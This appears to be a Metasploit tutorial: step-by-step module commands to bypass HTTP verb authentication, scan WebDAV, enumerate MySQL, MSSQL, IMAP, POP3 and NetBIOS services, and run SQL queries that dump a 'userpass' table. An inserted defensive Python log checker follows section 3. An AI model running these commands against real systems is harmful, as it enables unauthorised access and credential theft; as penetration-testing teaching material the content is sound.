1) BYPASSING THE HTTP VERB AUTHENTICATION OF TARGET:
We can bypass the authentication applied to different HTTP verbs by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/http/verb_auth_bypass)
(show options)
(set RHOSTS + IP of target) e.g. (set RHOSTS 192.168.8.4)
(set PATH + path protected by HTTP authentication) e.g. (set PATH /xmpp/)
(run)
2) CHECKING WHETHER WEBDAV IS ENABLED ON TARGET WEBSITE:
We can check whether WebDAV is enabled or disabled on the different hosts of our target website's network by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/http/webdav_scanner)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-110)
(set THREADS + number of concurrent threads) e.g. (set THREADS 20)
(run)
3) FINDING THE CONTENT OF DIFFERENT FILES OF TARGET WEBSITE USING WEBDAV:
We can see the content of different files of the target website, when WebDAV is enabled on the target, by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/http/webdav_website_content)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-110)
(run)
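A defensive check for sections 1 to 3, added here as an example (it is not part of the original notes or of Metasploit): it reads web server access logs and reports paths where one HTTP verb is answered 401 while another verb is served without a logged user, plus WebDAV verbs the server answered successfully. The log lines are constructed samples in Common Log Format, the function names are hypothetical, and it assumes the server logs the authenticated user in the third field.

```python
import re
from collections import defaultdict

# Constructed sample lines in Common Log Format (not from a real server).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /xmpp/ HTTP/1.1" 401 381
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "HEAD /xmpp/ HTTP/1.1" 200 0
192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "TRACE /xmpp/ HTTP/1.1" 405 0
192.0.2.11 - alice [01/Jan/2024:10:01:00 +0000] "GET /xmpp/ HTTP/1.1" 200 512
192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "OPTIONS / HTTP/1.1" 200 0
192.0.2.12 - - [01/Jan/2024:10:02:01 +0000] "PROPFIND / HTTP/1.1" 207 1843
192.0.2.13 - - [01/Jan/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<verb>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

WEBDAV_VERBS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}

def parse(log_text):
    """Yield (ip, user, verb, path, status) for every line that parses."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m["ip"], m["user"], m["verb"], m["path"], int(m["status"])

def find_issues(log_text):
    denied = defaultdict(set)   # path -> verbs answered 401
    allowed = defaultdict(set)  # path -> verbs answered 2xx with no logged user
    webdav = set()              # (ip, verb, path) for WebDAV verbs answered 2xx
    for ip, user, verb, path, status in parse(log_text):
        if status == 401:
            denied[path].add(verb)
        elif 200 <= status < 300 and user == "-":
            allowed[path].add(verb)
        if verb in WEBDAV_VERBS and 200 <= status < 300:
            webdav.add((ip, verb, path))
    # A path that demands credentials for one verb but serves another without
    # them has authentication tied to specific verbs instead of the resource.
    verb_gaps = {p: sorted(allowed[p] - denied[p])
                 for p in denied if allowed[p] - denied[p]}
    return verb_gaps, sorted(webdav)

if __name__ == "__main__":
    print(find_issues(SAMPLE_LOG))
```

A path reported in the first result needs its access rule changed so that it covers every method, and a host reported in the second is serving WebDAV and should have it disabled if it is not required.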
4) DETECTION OF MYSQL VERSION OF TARGET:
We can detect the MySQL version of the target website by using the following commands:
(msfconsole)
(use auxiliary/scanner/mysql/mysql_version)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set THREADS + number of concurrent threads) e.g. (set THREADS 20)
(run)
5) FINDING THE DETAILS OF LISTENING TCP PORTS OF MSSQL SERVER OF TARGET WEBSITE:
We can find the TCP ports the target's MSSQL server is listening on by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/mssql/mssql_ping)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set THREADS + number of concurrent threads) e.g. (set THREADS 20)
(run)
6) FINDING THE DATABASE DETAILS OF MSSQL OF TARGET:
We can find the MSSQL database details of our target website for further database attacks by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/admin/mssql/mssql_idf)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set NAMES username|password)
(set PASSWORD + password of MSSQL of target) e.g. (set PASSWORD password123)
(run)
7) RUNNING SQL QUERIES ON DATABASE OF TARGET:
We can run SQL queries against the database of the target by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/admin/mssql/mssql_sql)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-21)
(set PASSWORD + password of MSSQL server of target) e.g. (set PASSWORD password1)
(set SQL + SQL query to run) e.g. (set SQL use login;select * from userpass)
(run)
8) FINDING SOME DETAILS OF IMAP OF TARGET WEB SERVER:
We can find the IMAP version and banner details of the target's IMAP server by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/imap/imap_version)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-10)
(set THREADS + number of concurrent threads) e.g. (set THREADS 20)
(run)
9) FINDING THE NETBIOS NAME OF TARGET BY SEQUENTIAL NETBIOS PROBES:
We can find the NetBIOS names of the hosts in the target IP range by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/netbios/nbname_probe)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-10)
(set THREADS + number of concurrent threads) e.g. (set THREADS 11)
(run)
10) FINDING THE POP3 VERSIONS OF TARGET IP RANGE:
We can find the versions of the target's POP3 mail servers by using the following commands in Metasploit:
(msfconsole)
(use auxiliary/scanner/pop3/pop3_version)
(show options)
(set RHOSTS + IP range of target) e.g. (set RHOSTS 192.168.8.4-20)
(set THREADS + number of concurrent threads) e.g. (set THREADS 20)
(run)